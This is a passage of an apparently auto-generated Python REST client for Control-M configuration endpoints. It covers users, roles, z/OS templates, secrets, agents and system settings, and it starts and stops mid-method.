['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/systemsettings', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SystemSetting', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), 
_preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_user(self, user, **kwargs): # noqa: E501 """Get user # noqa: E501 Get user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_user(user, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :return: UserData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_user_with_http_info(user, **kwargs) # noqa: E501 else: (data) = self.get_user_with_http_info(user, **kwargs) # noqa: E501 return data def get_user_with_http_info(self, user, **kwargs): # noqa: E501 """Get user # noqa: E501 Get user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_user_with_http_info(user, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :return: UserData If the method is called asynchronously, returns the request thread. 
""" all_params = ['user'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `get_user`") # noqa: E501 collection_formats = {} path_params = {} if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/{user}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='UserData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_user_effective_rights(self, **kwargs): # noqa: E501 """Get user real effective authorizations # noqa: E501 Get user real effective authorizations by all his roles # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_user_effective_rights(async_req=True) >>> result = thread.get() :param async_req bool :return: RoleData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_user_effective_rights_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_user_effective_rights_with_http_info(**kwargs) # noqa: E501 return data def get_user_effective_rights_with_http_info(self, **kwargs): # noqa: E501 """Get user real effective authorizations # noqa: E501 Get user real effective authorizations by all his roles # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_user_effective_rights_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: RoleData If the method is called asynchronously, returns the request thread. 
""" all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_user_effective_rights" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/effectiveRights', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RoleData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_zos_templates(self, server, agent, **kwargs): # noqa: E501 """Get z/OS Templates # noqa: E501 Get z/OS Templates # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_zos_templates(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str name: The z/OS Template Name :return: list[ZosTemplateData] If the method is called asynchronously, returns the request thread. 
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_zos_templates_with_http_info(server, agent, **kwargs)  # noqa: E501
        else:
            (data) = self.get_zos_templates_with_http_info(server, agent, **kwargs)  # noqa: E501
            return data

    def get_zos_templates_with_http_info(self, server, agent, **kwargs):  # noqa: E501
        """Get z/OS Templates  # noqa: E501

        Get z/OS Templates  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_zos_templates_with_http_info(server, agent, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :param str name: The z/OS Template Name
        :return: list[ZosTemplateData]
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['server', 'agent', 'name']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_zos_templates" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `get_zos_templates`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `agent` when calling `get_zos_templates`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501

        query_params = []
        if 'name' in params:
            query_params.append(('name', params['name']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        # Delegate the actual HTTP GET to the shared ApiClient.
        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/mft/zostemplates', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[ZosTemplateData]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def import_role(self, role_file, **kwargs):  # noqa: E501
        """Import Authorization Role  # noqa: E501

        Import Authorization Role  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.import_role(role_file, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param file role_file: File with content of RoleDataFull. (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.import_role_with_http_info(role_file, **kwargs)  # noqa: E501
        else:
            (data) = self.import_role_with_http_info(role_file, **kwargs)  # noqa: E501
            return data

    def import_role_with_http_info(self, role_file, **kwargs):  # noqa: E501
        """Import Authorization Role  # noqa: E501

        Import Authorization Role  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.import_role_with_http_info(role_file, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param file role_file: File with content of RoleDataFull. (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['role_file']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method import_role" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'role_file' is set
        if self.api_client.client_side_validation and ('role_file' not in params or params['role_file'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `role_file` when calling `import_role`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}
        # The role file is uploaded as a multipart form part named 'roleFile'.
        if 'role_file' in params:
            local_var_files['roleFile'] = params['role_file']  # noqa: E501

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['multipart/form-data'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        # Delegate the actual HTTP POST to the shared ApiClient.
        return self.api_client.call_api(
            '/config/authorization/role/import', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def list_secrets(self, **kwargs):  # noqa: E501
        """Get list of secret names  # noqa: E501

        Get the list of names of all the secrets in the vault  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_secrets(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: StringListResult
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.list_secrets_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.list_secrets_with_http_info(**kwargs)  # noqa: E501
            return data

    def list_secrets_with_http_info(self, **kwargs):  # noqa: E501
        """Get list of secret names  # noqa: E501

        Get the list of names of all the secrets in the vault  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_secrets_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: StringListResult
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_secrets" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        # Delegate the actual HTTP GET to the shared ApiClient.
        return self.api_client.call_api(
            '/config/secrets', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='StringListResult',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def ping_agent(self, server, agent, **kwargs):  # noqa: E501
        """ping to the agent in the Server  # noqa: E501

        Ping an Agent.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.ping_agent(server, agent, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server. (required)
        :param str agent: The Agent. (required)
        :param PingAgentParams body:
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.ping_agent_with_http_info(server, agent, **kwargs)  # noqa: E501
        else:
            (data) = self.ping_agent_with_http_info(server, agent, **kwargs)  # noqa: E501
            return data

    def ping_agent_with_http_info(self, server, agent, **kwargs):  # noqa: E501
        """ping to the agent in the Server  # noqa: E501

        Ping an Agent.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.ping_agent_with_http_info(server, agent, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server. (required)
        :param str agent: The Agent. (required)
        :param PingAgentParams body:
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['server', 'agent', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method ping_agent" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `ping_agent`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `agent` when calling `ping_agent`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501

        query_params = []
        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        # Delegate the actual HTTP POST to the shared ApiClient.
        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/ping', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def recycle_item(self, id, **kwargs):  # noqa: E501
        """recycle item  # noqa: E501

        Recycle an item  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.recycle_item(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: item data (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.recycle_item_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.recycle_item_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def recycle_item_with_http_info(self, id, **kwargs):  # noqa: E501
        """recycle item  # noqa: E501

        Recycle an item  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.recycle_item_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: item data (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method recycle_item" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in params or params['id'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `id` when calling `recycle_item`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        # Delegate the actual HTTP POST to the shared ApiClient.
        return self.api_client.call_api(
            '/config/item/{id}/recycle', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def set_agent_parameter(self, server, agent, name, **kwargs):  # noqa: E501
        """set agent parameter  # noqa: E501

        Set the value of the specified parameter in the specified agent.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_agent_parameter(server, agent, name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the agent is connected to. (required)
        :param str agent: The name of the agent to update. (required)
        :param str name: The parameter name. (required)
        :param OptionalValue body: The new parameter value.
        :return: KeyValue
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.set_agent_parameter_with_http_info(server, agent, name, **kwargs)  # noqa: E501
        else:
            (data) = self.set_agent_parameter_with_http_info(server, agent, name, **kwargs)  # noqa: E501
            return data

    def set_agent_parameter_with_http_info(self, server, agent, name, **kwargs):  # noqa: E501
        """set agent parameter  # noqa: E501

        Set the value of the specified parameter in the specified agent.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_agent_parameter_with_http_info(server, agent, name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the agent is connected to. (required)
        :param str agent: The name of the agent to update. (required)
        :param str name: The parameter name. (required)
        :param OptionalValue body: The new parameter value.
        :return: KeyValue
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['server', 'agent', 'name', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method set_agent_parameter" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `set_agent_parameter`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `agent` when calling `set_agent_parameter`")  # noqa: E501
        # verify the required parameter 'name' is set
        if self.api_client.client_side_validation and ('name' not in params or params['name'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `name` when calling `set_agent_parameter`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        # Delegate the actual HTTP POST to the shared ApiClient.
        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/param/{name}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='KeyValue',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def set_system_setting(self, systemsetting, **kwargs):  # noqa: E501
        """Set system setting for Control-M environment  # noqa: E501

        Set system setting for Control-M environment  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_system_setting(systemsetting, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param file systemsetting: System Setting JSON file (required)
        :param file saml2metadatafile: SAML2 Identity Provider Metadata file to upload
        :param str server: Server to which the system settings are applied
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.set_system_setting_with_http_info(systemsetting, **kwargs)  # noqa: E501
        else:
            (data) = self.set_system_setting_with_http_info(systemsetting, **kwargs)  # noqa: E501
            return data

    def set_system_setting_with_http_info(self, systemsetting, **kwargs):  # noqa: E501
        """Set system setting for Control-M environment  # noqa: E501

        Set system setting for Control-M environment  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_system_setting_with_http_info(systemsetting, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param file systemsetting: System Setting JSON file (required)
        :param file saml2metadatafile: SAML2 Identity Provider Metadata file to upload
        :param str server: Server to which the system settings are applied
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['systemsetting', 'saml2metadatafile', 'server']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method set_system_setting" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'systemsetting' is set
        if self.api_client.client_side_validation and ('systemsetting' not in params or params['systemsetting'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `systemsetting` when calling `set_system_setting`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'server' in params:
            query_params.append(('server', params['server']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}
        # Both files are uploaded as multipart form parts.
        if 'systemsetting' in params:
            local_var_files['systemsetting'] = params['systemsetting']  # noqa: E501
        if 'saml2metadatafile' in params:
            local_var_files['saml2metadatafile'] = params['saml2metadatafile']  # noqa: E501

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['multipart/form-data'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        # Delegate the actual HTTP POST to the shared ApiClient.
        return self.api_client.call_api(
            '/config/systemsettings', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def set_user_preferences(self, user_name, user_preferences, **kwargs):  # noqa: E501
        """Set user preferences by user name  # noqa: E501

        Set user preferences by user name.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_user_preferences(user_name, user_preferences, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str user_name: The name of the user (required)
        :param UserPreferences user_preferences: The new value of UserPreferences to set (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.set_user_preferences_with_http_info(user_name, user_preferences, **kwargs)  # noqa: E501
        else:
            (data) = self.set_user_preferences_with_http_info(user_name, user_preferences, **kwargs)  # noqa: E501
            return data

    def set_user_preferences_with_http_info(self, user_name, user_preferences, **kwargs):  # noqa: E501
        """Set user preferences by user name  # noqa: E501

        Set user preferences by user name.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.set_user_preferences_with_http_info(user_name, user_preferences, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str user_name: The name of the user (required)
        :param UserPreferences user_preferences: The new value of UserPreferences to set (required)
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['user_name', 'user_preferences']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method set_user_preferences" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'user_name' is set
        if self.api_client.client_side_validation and ('user_name' not in params or params['user_name'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `user_name` when calling `set_user_preferences`")  # noqa: E501
        # verify the required parameter 'user_preferences' is set
        if self.api_client.client_side_validation and ('user_preferences' not in params or params['user_preferences'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `user_preferences` when calling `set_user_preferences`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'user_name' in params:
            query_params.append(('userName', params['user_name']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'user_preferences' in params:
            body_params = params['user_preferences']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        # Delegate the actual HTTP POST to the shared ApiClient.
        return self.api_client.call_api(
            '/config/authorization/user/preferences', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SuccessData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def test_run_as_user(self, server, agent, user, **kwargs):  # noqa: E501
        """Test existing Run-as user  # noqa: E501

        Test existing Run-as user in server.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.test_run_as_user(server, agent, user, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server. (required)
        :param str agent: The Agent (required)
        :param str user: The user name (required)
        :param RunAsUserDetailsData run_as_user_details_data: Run as user details data
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.test_run_as_user_with_http_info(server, agent, user, **kwargs)  # noqa: E501
        else:
            (data) = self.test_run_as_user_with_http_info(server, agent, user, **kwargs)  # noqa: E501
            return data

    def test_run_as_user_with_http_info(self, server, agent, user, **kwargs):  # noqa: E501
        """Test existing Run-as user  # noqa: E501

        Test existing Run-as user in server.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.test_run_as_user_with_http_info(server, agent, user, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server. (required)
        :param str agent: The Agent (required)
        :param str user: The user name (required)
        :param RunAsUserDetailsData run_as_user_details_data: Run as user details data
        :return: SuccessData
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['server', 'agent', 'user', 'run_as_user_details_data']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        # Reject any keyword argument this endpoint does not declare.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method test_run_as_user" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `test_run_as_user`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `agent` when calling `test_run_as_user`")  # noqa: E501
        # verify the required parameter 'user' is set
        if self.api_client.client_side_validation and ('user' not in params or params['user'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `user` when calling `test_run_as_user`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
